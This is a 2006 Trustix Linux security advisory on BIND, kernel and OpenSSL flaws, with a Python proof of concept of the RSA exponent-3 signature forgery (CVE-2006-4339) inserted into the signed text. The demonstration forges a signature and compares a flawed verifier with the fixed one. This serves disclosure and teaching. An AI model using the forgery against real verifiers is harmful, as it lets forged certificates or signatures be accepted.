-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Trustix Secure Linux Security Advisory #2006-0051

Package names:     bind, kernel, openssl
Summary:           Multiple vulnerabilities
Date:              2006-09-15
Affected versions: Trustix Secure Linux 2.2
                   Trustix Secure Linux 3.0
                   Trustix Operating System - Enterprise Server 2

- --------------------------------------------------------------------------
Package description:
  bind
  BIND (Berkeley Internet Name Domain) is an implementation of the DNS
  (Domain Name System) protocols. BIND includes a DNS server (named), which
  resolves host names to IP addresses, and a resolver library (routines for
  applications to use when interfacing with DNS). A DNS server allows clients
  to name resources or objects and share the information with other network
  machines. The named DNS server can be used on workstations as a caching
  name server, but is generally only needed on one machine for an entire
  network.

  kernel
  The kernel package contains the Linux kernel (vmlinuz), the core of your
  Trustix Secure Linux operating system. The kernel handles the basic
  functions of the operating system: memory allocation, process allocation,
  device input and output, etc.

  openssl
  A C library that provides various cryptographic algorithms and protocols
  including DES, RC4, RSA, and SSL. Includes shared libraries.

Problem description:
  bind < TSL 3.0 > < TSL 2.2 > < TSEL 2 >
  - New Upstream.
  - SECURITY Fix: Two vulnerabilities have been reported in BIND, which can
    be exploited by malicious people to cause a DoS.
  - Fix an assertion error within the processing of SIG queries that can be
    exploited to crash either a recursive server when more than one
    SIG(covered) Resource Record set (RRset) is returned, or an authoritative
    server serving an RFC 2535 DNSSEC zone where there are multiple
    SIG(covered) RRsets (CVE-2006-4095).
  - Fix an error within the handling of multiple recursive queries that can
    be exploited to trigger an INSIST failure by causing the response to the
    query to arrive after all clients looking for the response have left the
    recursion queue (CVE-2006-4096).
  The Common Vulnerabilities and Exposures project (cve.mitre.org) has
  assigned the names CVE-2006-4095 and CVE-2006-4096 to these issues.

  kernel < TSL 2.2 >
  - New Upstream.
  - SECURITY Fix: Fix possible UDF deadlock and memory corruption
    (CVE-2006-4145).
  - McAfee Avert Labs has reported a vulnerability in the Linux Kernel, which
    can be exploited by malicious, local users to gain escalated privileges.
    The vulnerability is caused by an error in the SCTP module within the
    "sctp_make_abort_user()" function and can be exploited to execute
    arbitrary code with escalated privileges (CVE-2006-3745).
  The Common Vulnerabilities and Exposures project (cve.mitre.org) has
  assigned the names CVE-2006-4145 and CVE-2006-3745 to these issues.
  - Also includes fixes for CVE-2006-0039, CVE-2006-1857, CVE-2006-1858,
    CVE-2006-1864, CVE-2006-2271, CVE-2006-2272, CVE-2006-1525,
    CVE-2006-2274, CVE-2006-1524, CVE-2005-3180, CVE-2005-2709,
    CVE-2005-2708, CVE-2005-2490, CVE-2006-1528 and CVE-2006-4093.

  openssl < TSL 3.0 > < TSL 2.2 > < TSEL 2 >
  - New Upstream.
  - SECURITY Fix: A vulnerability has been identified which could be
    exploited by attackers to bypass security restrictions. The flaw is in
    the verification of PKCS #1 v1.5 signatures made with RSA keys that use
    public exponent 3: the verifier did not check that the recovered, padded
    signature block was consumed in full, so an attacker who knows only the
    public key can build a value whose cube starts with valid padding and the
    expected hash and carries unchecked bytes after it, and have it accepted
    as a genuine signature (the signatures on X.509 certificates are the
    obvious target). The Common Vulnerabilities and Exposures project
    (cve.mitre.org) has assigned the name CVE-2006-4339 to this issue.

Action:
  We recommend that all systems with these packages installed be upgraded.
  Please note that if you do not need the functionality provided by a
  package, you may want to remove it from your system.
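The OpenSSL issue above, as an added worked example (this is not Trustix or OpenSSL code; the key, the message and every function name are constructed for the demonstration): a PKCS #1 v1.5 verifier that walks the padding, checks the hash and ignores whatever follows it, next to one that rebuilds the entire expected block, together with the forgery that the first one accepts without the private key ever being used. It assumes a 2048-bit modulus with e = 3, generated inside the script, and SHA-1 as the digest, as was typical for certificates of the period.

```python
"""Added example (not Trustix or OpenSSL code): the RSA e=3 PKCS #1 v1.5 forgery
class behind CVE-2006-4339, run against a lenient verifier (the bug) and a strict
one (the fix). Key, message and all names here are constructed for the demo."""
import hashlib
import random

E = 3  # the low public exponent the attack needs
# DER prefix of DigestInfo for SHA-1 (RFC 3447 9.2, note 1): SEQUENCE {
# SEQUENCE { OID 1.3.14.3.2.26, NULL }, OCTET STRING (20 bytes) }
SHA1_DIGESTINFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")

def digest_info(msg):
    """T = DigestInfo(SHA-1(msg)), the trailer of an EMSA-PKCS1-v1_5 block."""
    return SHA1_DIGESTINFO_PREFIX + hashlib.sha1(msg).digest()

def emsa_encode(n, msg):
    """EM = 00 01 || FF * (k - len(T) - 3) || 00 || T, k = byte length of n."""
    t, k = digest_info(msg), (n.bit_length() + 7) // 8
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def recover_block(n, sig):
    """Apply the public key: EM = sig**E mod n, as a k-byte big-endian string."""
    return pow(sig, E, n).to_bytes((n.bit_length() + 7) // 8, "big")

def verify_lenient(n, sig, msg):
    """Pre-fix behaviour: walk the padding, find T, compare the hash, ignore the
    rest. (OpenSSL parsed ASN.1 rather than scanning bytes; same unchecked tail.)"""
    em = recover_block(n, sig)
    sep = em.find(b"\x00", 2)                       # end of the 0xFF run
    if em[:2] != b"\x00\x01" or sep < 10 or any(b != 0xFF for b in em[2:sep]):
        return False                                # needs >= 8 bytes of 0xFF
    return em[sep + 1:].startswith(digest_info(msg))  # BUG: tail never checked

def verify_strict(n, sig, msg):
    """Fixed behaviour (RFC 3447 8.2.2): rebuild EM and compare all k bytes.
    Production code would use hmac.compare_digest for this comparison."""
    return recover_block(n, sig) == emsa_encode(n, msg)

def icbrt_ceil(x):
    """Smallest integer s with s**3 >= x (binary search, exact on big ints)."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        lo, hi = (mid + 1, hi) if mid ** 3 < x else (lo, mid)
    return lo

def forge_e3(n, msg):
    """Bleichenbacher (2006): put 00 01 FF*8 00 || T at the top of the block and
    zeros below, then take the ceiling cube root. s**3 < n, so nothing is reduced
    mod n, and the rounding error (< 3*s**2) only lands in the low bytes."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(msg)
    s = icbrt_ceil(int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big"))
    assert s ** 3 < n, "modulus too small to absorb the rounding error"
    return s

# Minimal RSA key generation, only so the genuine-signature path can be shown.
SMALL_PRIMES = [p for p in range(3, 1000, 2) if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]

def is_probable_prime(n, rng, rounds=20):
    """Trial division by SMALL_PRIMES, then Miller-Rabin with random bases."""
    if any(n % p == 0 for p in SMALL_PRIMES):
        return n in SMALL_PRIMES
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_prime_for_e3(bits, rng):
    """Prime with the top two bits set and p % 3 == 2, so gcd(3, p - 1) == 1."""
    while True:
        c = rng.getrandbits(bits) | (3 << (bits - 2)) | 1
        if c % 3 == 2 and is_probable_prime(c, rng):
            return c

def demo(seed=2006):
    rng = random.Random(seed)                       # seeded: reproducible demo key
    p, q = gen_prime_for_e3(1024, rng), gen_prime_for_e3(1024, rng)
    n, d = p * q, pow(E, -1, (p - 1) * (q - 1))     # 2048-bit modulus, e = 3
    msg = b"constructed sample: tbsCertificate for CN=example.test"
    genuine = pow(int.from_bytes(emsa_encode(n, msg), "big"), d, n)
    forged = forge_e3(n, msg)                       # uses only (n, E) and msg
    return {
        "genuine_lenient": verify_lenient(n, genuine, msg),   # True
        "genuine_strict": verify_strict(n, genuine, msg),     # True
        "forged_lenient": verify_lenient(n, forged, msg),     # True: the bug
        "forged_strict": verify_strict(n, forged, msg),       # False: the fix
        "forged_other_msg": verify_lenient(n, forged, b"some other message"),  # False
    }

if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name:17s} {'accept' if accepted else 'reject'}")
```

Run it directly to see accept/reject for each case. The forgery involves no factoring: with e = 3 the cube root of a 2048-bit block whose top 46 bytes are fixed and whose remaining 210 bytes are free is a 678-bit integer, and the rounding error of that root (under 2^1357) fits entirely in the free bytes, so the recovered block carries the right prefix and hash with garbage after them. The fix is only to compare the complete k-byte block, which is what RFC 3447 section 8.2.2 prescribes; any verifier that takes the block apart by hand needs the same check, and production code should make the comparison constant-time.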
Location:
  All Trustix Secure Linux updates are available from

About Trustix Secure Linux:
  Trustix Secure Linux is a small Linux distribution for servers. With focus
  on security and stability, the system is painlessly kept safe and up to
  date from day one using swup, the automated software updater.

Automatic updates:
  Users of the SWUP tool can enjoy having updates automatically installed
  using 'swup --upgrade'.

Questions?
  Check out our mailing lists:

Verification:
  This advisory, along with all Trustix packages, is signed with the TSL sign
  key. This key is available from:

  The advisory itself is available from the errata pages at
  and
  or directly at

MD5sums of the packages:
- --------------------------------------------------------------------------
8a2c2f1f1da74781b4ecc088ccc76c62  3.0/rpms/bind-9.3.2-4tr.i586.rpm
ac17273772c921b947efaa4bbf045828  3.0/rpms/bind-devel-9.3.2-4tr.i586.rpm
5d0f66272575fcd9d4b4ac8696edfd2e  3.0/rpms/bind-libs-9.3.2-4tr.i586.rpm
4dc5e7726e88ee9071861eb35a14e44c  3.0/rpms/bind-light-9.3.2-4tr.i586.rpm
8a014940633e0a29375c62c3708a4e63  3.0/rpms/bind-light-devel-9.3.2-4tr.i586.rpm
d4da9d9e490b24e847434b47238107dd  3.0/rpms/bind-utils-9.3.2-4tr.i586.rpm
9c69891182a0c1c60870e89b41642f62  3.0/rpms/openssl-0.9.7k-1tr.i586.rpm
f5b5390d931bc5ebd9c4e0d8aadd9286  3.0/rpms/openssl-devel-0.9.7k-1tr.i586.rpm
deb2d3a044994706727989f07f84e70a  3.0/rpms/openssl-support-0.9.7k-1tr.i586.rpm

edcfc0e0b33e584772b3ab38c2ecc120  2.2/rpms/bind-9.3.2-4tr.i586.rpm
7c10280e5e0e85decd471c740651fcf7  2.2/rpms/bind-devel-9.3.2-4tr.i586.rpm
0b31ab1242338a21373a5b5677b38d15  2.2/rpms/bind-libs-9.3.2-4tr.i586.rpm
8715527a40ead4ce8e279ea85e96945b  2.2/rpms/bind-light-9.3.2-4tr.i586.rpm
a6e53d9494c395aa0b9964e91504063f  2.2/rpms/bind-light-devel-9.3.2-4tr.i586.rpm
fc9730b297ec56db37babc9d69f0777f  2.2/rpms/bind-utils-9.3.2-4tr.i586.rpm
2cb53a6092ab2de443576fc493c7c61f  2.2/rpms/kernel-2.4.33.3-1tr.i586.rpm
99ebf5b654d17918297f3ade9a188797  2.2/rpms/kernel-BOOT-2.4.33.3-1tr.i586.rpm
9d2325bf115bc51b97f3a1b7858950cd  2.2/rpms/kernel-doc-2.4.33.3-1tr.i586.rpm
22425048536337cfa6a78b50bc50b227  2.2/rpms/kernel-smp-2.4.33.3-1tr.i586.rpm
13aa3038815b939c4385c48738027097  2.2/rpms/kernel-source-2.4.33.3-1tr.i586.rpm
969b1acbb169f601348b429a1cd65d4b  2.2/rpms/kernel-utils-2.4.33.3-1tr.i586.rpm
d45c46c044c54a836b0a3e8b0ea61bd8  2.2/rpms/openssl-0.9.7e-7tr.i586.rpm
3d60834f48d77853e81606d2bcfbda81  2.2/rpms/openssl-devel-0.9.7e-7tr.i586.rpm
2bc39b5e84a862657dd28999fdddf43c  2.2/rpms/openssl-python-0.9.7e-7tr.i586.rpm
be83cfcd1ceae92288cbaf3d510a0482  2.2/rpms/openssl-support-0.9.7e-7tr.i586.rpm
- --------------------------------------------------------------------------

Trustix Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFFCrAZi8CEzsK9IksRAvIoAKCjFeJ+3aT++bYdEiclBP9//+xnrwCgm4XM
awIqUWa4H4yxfCDNoVpW2ms=
=Fq5S
-----END PGP SIGNATURE-----